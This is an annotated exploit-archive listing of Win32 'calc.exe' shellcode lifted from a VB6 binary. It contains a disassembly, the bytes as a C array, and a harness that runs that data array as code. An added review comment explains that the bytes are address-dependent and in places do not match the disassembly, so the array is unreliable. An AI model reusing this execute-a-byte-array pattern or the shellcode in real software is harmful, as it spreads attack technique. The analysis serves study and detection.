1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # =========[ Sh31LC0d3.C ]=====>
/* ###
 # Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
 # Author : KedAns-Dz
 # E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
 # Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
 # Twitter page : twitter.com/kedans
 # platform : Win32
 # Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
 # Tested on : Windows XP SP3 France
 ### */

/*
 * Review notes (analyst / defender stance).
 *
 * What this listing actually is: a copy of the VB6 compiler's output for a
 * procedure that calls Shell("calc.exe"), lifted from the author's test binary
 * k3d4n5.exe (disassembly below).  It is not self-contained, position-independent
 * shellcode:
 *   - it installs an SEH frame whose handler is the absolute address 0x00401096
 *     (PUSH at 004018E6) and stores the absolute address 0x00401080 into the
 *     frame (00401902);
 *   - it reaches MSVBVM60.__vbaVarDup, MSVBVM60.rtcShell (#600) and
 *     MSVBVM60.__vbaFreeVar through absolute IAT slots of that same image
 *     (0x00401068, 0x00401034, 0x00401008).
 * Mapped at any other address, or into any process that is not this exact VB6
 * image with msvbvm60.dll loaded, those pointers are meaningless and execution
 * faults before rtcShell is reached.
 *
 * Triage/detection view: the FS:[0] frame push/pop around calls into MSVBVM60
 * imports is ordinary VB6 procedure prologue/epilogue; the only payload-specific
 * content is the "calc.exe" literal and the rtcShell call.
 *
 * "149 Bytes" in the title is sizeof SEH: 148 escaped bytes plus the string
 * literal's terminating NUL.
 *
 * NOTE(review): SEH[] is not a faithful transcription of the disassembly either —
 * several byte groups differ from the opcode bytes shown (compare, e.g., the bytes
 * following 64 89 25 with line 004018F2, and the immediate of the PUSH at
 * 0040195C).  The 8-byte "calc.exe" immediate shown at 0040192D is not a valid
 * encoding of a 32-bit MOV and appears to be a hand-edited dump.
 */

// TesT Project >> Compile As Name k3d4n5.exe <<
/*
004018E0 > 55 | PUSH EBP
004018E1 . 8BEC | MOV EBP,ESP
004018E3 . 83EC 0C | SUB ESP,0C
004018E6 . 68 96104000 | PUSH ; SE handler installation (SEH)
004018EB . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]
004018F1 . 50 | PUSH EAX
004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP
004018F9 . 83EC 30 | SUB ESP,30
004018FC . 53 | PUSH EBX
004018FD . 56 | PUSH ESI
004018FE . 57 | PUSH EDI
004018FF . 8965 F4 | MOV DWORD PTR SS:[EBP-C],ESP
00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080
00401909 . 8B45 08 | MOV EAX,DWORD PTR SS:[EBP+8]
0040190C . 8BC8 | MOV ECX,EAX
0040190E . 83E1 01 | AND ECX,1
00401911 . 894D FC | MOV DWORD PTR SS:[EBP-4],ECX
00401914 . 24 FE | AND AL,0FE
00401916 . 50 | PUSH EAX
00401917 . 8945 08 | MOV DWORD PTR SS:[EBP+8],EAX
0040191A . 8B10 | MOV EDX,DWORD PTR DS:[EAX]
0040191C . FF52 04 | CALL DWORD PTR DS:[EDX+4]
0040191F . 33F6 | XOR ESI,ESI
00401921 . 8D55 CC | LEA EDX,DWORD PTR SS:[EBP-34]
00401924 . 8975 CC | MOV DWORD PTR SS:[EBP-34],ESI
00401927 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
0040192A . 8975 DC | MOV DWORD PTR SS:[EBP-24],ESI
0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe
00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8
0040193B . FF15 68104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup
00401941 . 8D45 DC | LEA EAX,DWORD PTR SS:[EBP-24]
00401944 . 6A 02 | PUSH 2
00401946 . 50 | PUSH EAX
00401947 . FF15 34104000 | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell
0040194D . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401950 . DDD8 | FSTP ST
00401952 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
00401958 . 8975 FC | MOV DWORD PTR SS:[EBP-4],ESI
0040195B . 9B | WAIT
0040195C . 68 6E194000 | PUSH k3d4n5.0040196E
00401961 . EB 0A | JMP SHORT k3d4n5.0040196D
00401963 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401966 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
0040196C . C3 | RETN
*/

/*
 * Raw bytes of the procedure above as a C string (148 bytes + NUL).  Stored in a
 * writable, normally non-executable data section; see the notes on main() below.
 */
char SEH[] =
"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"
"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"
"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"
"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"
"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"
"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"
"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"
"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";

/*
 * Test harness: reinterprets the SEH[] data array as a function and calls it.
 *
 * - Converting an object pointer to a function pointer is undefined in ISO C
 *   (a common compiler extension); the call itself is what the page demonstrates.
 * - SEH[] lives in a writable data section.  On a DEP/NX-enforcing process the
 *   first fetch from it faults before any instruction runs — TODO confirm for the
 *   compiler and flags used, which the page does not state.
 * - The (int) cast on the discarded call result has no effect.
 * - argc/argv are unused.  main() has no return statement; C99 treats falling off
 *   the end of main() as `return 0;`.
 */
int main(int argc, char **argv)
{
    int (*shellcode)();                 /* unprototyped function-pointer type (pre-C23 style) */
    shellcode = (int (*)()) SEH;        /* data pointer -> code pointer: not portable C */
    (int)(*shellcode)();                /* transfers control into the byte array */
}

/*
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
#================================================================================================
*/